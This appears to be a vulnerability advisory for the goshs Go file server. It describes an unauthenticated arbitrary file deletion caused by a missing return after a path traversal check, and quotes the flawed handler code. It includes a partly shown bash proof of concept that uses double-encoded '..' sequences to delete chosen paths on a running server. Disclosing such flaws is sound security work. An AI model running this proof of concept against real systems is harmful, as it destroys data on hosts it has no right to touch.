deleteFile() missing return after path traversal check | httpserver/handler.go:645-671The finding affects the default configuration, no flags or authentication required.
File: httpserver/handler.go:645-671
Trigger: GET /<path>?delete (handler.go:157-160 dispatches to deleteFile)
The function detects .. in the decoded path but does not return.
func (fs *FileServer) deleteFile(w http.ResponseWriter, req *http.Request) {
upath := filepath.FromSlash(filepath.Clean("/" + strings.Trim(req.URL.Path, "/")))
fileCleaned, _ := url.QueryUnescape(upath)
if strings.Contains(fileCleaned, "..") {
w.WriteHeader(500)
_, err := w.Write([]byte("Cannot delete file"))
if err != nil {
logger.Errorf("error writing answer to client: %+v", err)
}
// BUG: no return, falls through to os.RemoveAll
}
deletePath := filepath.Join(fs.Webroot, fileCleaned)
err := os.RemoveAll(deletePath) // always executes
Root causes:
Missing return after the guard makes the check dead code
Impact: Unauthenticated arbitrary file/directory deletion.
PoCs:
#!/usr/bin/env bash
# Delete an arbitrary file/directory on a running goshs instance.
# Usage: ./arbitrary_delete.sh <host> <port> <absolute-path-to-delete>
set -euo pipefail
HOST="${1:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
PORT="${2:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
TARGET="${3:?Usage: $0 <host> <port> <absolute-path-to-delete>}"
# Double-encode ".." => %252e%252e
# We don't know the webroot depth, so use 16 levels (covers most paths).
TRAVERSAL=""
for _ in $(seq 1 16); do
TRAVERSAL="${TRAVERSAL}%252e%252e/"
done
# Strip leading / from target and URL-encode any special chars
TARGET_REL="${TARGET#/}"
ENCODED_TARGET=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$TARGET_REL', safe='/'))")...
1.1.5-0.20260401172448-237f3af891a9Exploitability
AV:NAC:LPR:NUI:NScope
S:UImpact
C:HI:HA:H9.8/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H